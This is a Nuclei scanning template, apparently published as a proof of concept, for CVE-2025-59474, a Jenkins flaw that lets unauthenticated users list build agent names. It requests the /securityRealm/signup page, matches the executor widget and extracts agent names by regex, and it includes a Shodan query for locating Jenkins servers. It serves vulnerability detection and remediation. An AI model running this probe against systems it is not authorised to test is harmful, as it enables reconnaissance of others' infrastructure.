Jenkins 2.527 and earlier, LTS 2.516.2 and earlier does not perform a permission check in the sidepanel of a page intentionally accessible to users lacking Overall/Read permission, allowing attackers without Overall/Read permission to list agent names through its sidepanel executors widget.
PoC代码[已公开]
id: CVE-2025-59474
info:
name: Jenkins Sidepanel - Unauthorized Agent/Queue Exposure
author: ivaldivieso
severity: medium
description: |
Jenkins 2.527 and earlier, LTS 2.516.2 and earlier does not perform a permission check in the sidepanel of a page intentionally accessible to users lacking Overall/Read permission, allowing attackers without Overall/Read permission to list agent names through its sidepanel executors widget.
impact: Attackers can list agent names without required permissions, potentially exposing sensitive infrastructure details.
remediation: Update to a version later than 2.527 or LTS later than 2.516.2.
reference:
- https://www.jenkins.io/security/advisory/2025-09-17/
- https://nvd.nist.gov/vuln/detail/CVE-2025-59474
- https://medium.com/@Th3hound/exposing-jenkins-agents-without-auth-research-on-cve-2025-59474-ff95a2e7d22a
metadata:
verified: true
max-request: 2
shodan-query: product:"jenkins"
tags: cve,cve2025,jenkins,sidepanel,unauth,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/securityRealm/signup"
- "{{BaseURL}}/jenkins/securityRealm/signup"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Build Executor Status'
- 'Estado del ejecutor'
- 'id="executors"'
condition: or
- type: regex
part: body
regex:
- 'href="[^"]*/computer/[^"]*/?"'
extractors:
- type: regex
name: agents
part: body
group: 1
regex:
- 'href="[^"]*/computer/([^"/]+)/?"'
internal: true
- type: dsl
dsl:
- 'urldecode(agents)'
# digest: 4a0a0047304502206c0c2b8d5f43427d574175ba0732aa2d631e691aff951a69fcbe015639534ef3022100865d934dc1e61af850f5bcab8a8b4d625ba71c87cf5ec28610a66bbfee8435be:922c64590222798bb761d5b6d8e72950